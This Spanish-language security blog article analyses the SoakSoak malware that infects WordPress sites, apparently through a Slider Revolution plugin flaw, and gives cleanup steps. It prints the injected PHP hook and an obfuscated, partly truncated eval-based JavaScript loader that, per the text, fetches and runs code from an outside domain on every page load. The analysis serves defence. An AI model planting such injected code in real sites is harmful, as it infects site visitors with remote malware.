Nuevo malware SoakSoak infectando WordPress
Hace ya unos días que desde Sucuri nos reportaban la aparición de un nuevo malware bautizado como SoakSoak, el cual está infectando miles de instalaciones WordPress. No se puede precisar con exactitud, pero se cree que el vector de ataque reside en una vulnerabilidad descubierta hace unos meses del plugin Slider Revolution.
Ya hablamos en un artículo anterior sobre como el autor de este plugin había subsanado un error de seguridad sin comunicarlo a sus clientes, ni tampoco lo llegó a notificar en el historial de cambios. Esto llevó a que los usuarios que disponían de este plugin pudiesen actualizarlo (porque tenían una notificación del sistema de actualizaciones), pero son muchos los desarrolladores que usan este plugin como parte de sus temas y al ser usado como componente extra del tema no se dispone de las notificaciones de actualización y dio como resultado cientos de temas vulnerables.
A continuación analizaremos el malware SoakSoak y daremos unos consejos para proceder a su limpieza y eliminación.
Análisis del malware SoakSoak en WordPress
Este malware modifica el archivo wp-includes/template-loader.php
inyectando el siguiente código:
function FuncQueueObject() { wp_enqueue_script("swfobject"); } add_action("wp_enqueue_scripts", 'FuncQueueObject');
Por otro lado inyecta en el archivo wp-includes/js/swfobject.js
el código Javascript siguiente:
eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
Con estos dos códigos consigue que cada vez que algún usuario cargue una página de WordPress se descargue y ejecute el malware de la página http://soaksoak.ru
.
Para realizar estas inyecciones de código, los hackers emplean un backdoor conocido como Filesman e incluso llegan a instalar un tema malicioso, pero no lo llegan a activar.
Cómo limpiar el malware SoakSoak en WordPress.
La limpieza del malware SoakSoak es relativamente sencilla porque infecta dos archivos que son parte del core de WordPress. Los pasos de forma resumida serían:
- Eliminar la carpeta
wp-includes
y todo su contenido. - Extraer del archivo zip de WordPress recién descargado la carpeta
wp-includes
y subirla a nuestro alojamiento web. - Revisar la carpeta
wp-content/themes/
en busca de archivos maliciosos. - Es recomendable emplear el plugin Sucuri para analizar nuestro sitio y después ir a la pestaña “Post-Hack” y emplear la funcionalidad de “Reset Plugins”.
- Por último, debemos cambiar las contraseñas de acceso al panel de administrador WordPress y también es recomendable cambiar la contraseña del usuario SQL de la base de datos.